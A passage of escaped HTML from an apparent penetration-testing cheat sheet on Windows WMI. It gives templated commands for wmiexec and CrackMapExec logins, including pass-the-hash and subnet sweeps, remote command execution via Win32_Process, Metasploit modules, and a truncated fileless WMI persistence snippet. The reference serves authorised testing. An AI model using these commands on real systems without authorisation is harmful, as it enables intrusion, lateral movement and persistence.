account)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py ./\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec\"\u003eCrackMapExec\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell-wmi-local--remote\"\u003ePowerShell WMI (Local \u0026amp; Remote)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Local system queries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_OperatingSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_ComputerSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Process\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_UserAccount\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Group\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress \u003cspan style=\"color:#f92672\"\u003e-ne\u003c/span\u003e $null\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Service | Where-Object { $_.State \u003cspan style=\"color:#f92672\"\u003e-eq\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Running\u0026#34;\u003c/span\u003e }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Product \u003cspan style=\"color:#75715e\"\u003e# Installed software (slow)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_LogicalDisk\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_StartupCommand \u003cspan style=\"color:#75715e\"\u003e# Startup items\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Modern equivalent (CIM)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-CimInstance -ClassName Win32_OperatingSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-CimInstance -ClassName Win32_Process\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Remote queries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_OperatingSystem -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Process -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell-wmi-remote-code-execution\"\u003ePowerShell WMI Remote Code Execution\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Execute command via WMI (leaves process behind)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-WmiMethod -Class Win32_Process -Name Create `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ArgumentList \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;cmd.exe /c whoami \u0026gt; C:\\output.txt\u0026#34;\u003c/span\u003e `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class CIM_DataFile -Filter \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Name=\u0026#39;C:\\output.txt\u0026#39;\u0026#34;\u003c/span\u003e `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wmic-legacy-cli--windows\"\u003ewmic (Legacy CLI — Windows)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e:\u003cspan style=\"color:#75715e\"\u003e: Local\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic os get Caption,Version,BuildNumber\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic process list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic useraccount list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic group list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic service where \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;State=\u0026#39;Running\u0026#39;\u0026#34;\u003c/span\u003e list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic product get Name,Version :: Installed software\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic startupinfo list full\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e:\u003cspan style=\"color:#75715e\"\u003e: Remote\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; os get Caption\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; process call create \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;cmd.exe /c whoami \u0026gt; C:\\out.txt\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; useraccount list brief\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wql-queries\"\u003eWQL Queries\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# WQL = WMI Query Language (SQL-like)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_Process WHERE Name=\u0026#39;lsass.exe\u0026#39;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_Service WHERE StartMode=\u0026#39;Auto\u0026#39; AND State=\u0026#39;Stopped\u0026#39;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_UserAccount WHERE LocalAccount=True\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit\"\u003eMetasploit\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse exploit/windows/smb/psexec \u003cspan style=\"color:#75715e\"\u003e# Uses WMI/DCOM under the hood\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse exploit/windows/local/wmi \u003cspan style=\"color:#75715e\"\u003e# Post-exploitation WMI persistence\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/winrm/winrm_wql \u003cspan style=\"color:#75715e\"\u003e# WQL via WinRM\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wmi-persistence-post-exploitation\"\u003eWMI Persistence (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Create permanent WMI event subscription (fileless persistence)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$filter = Set-WmiInstance -Class __EventFilter -Namespace \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;root\\subscription\u0026#34;\u003c/span\u003e -Arguments @{\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Name = \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;PentestFilter\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e EventNameSpace = \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;root\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"WMI"}]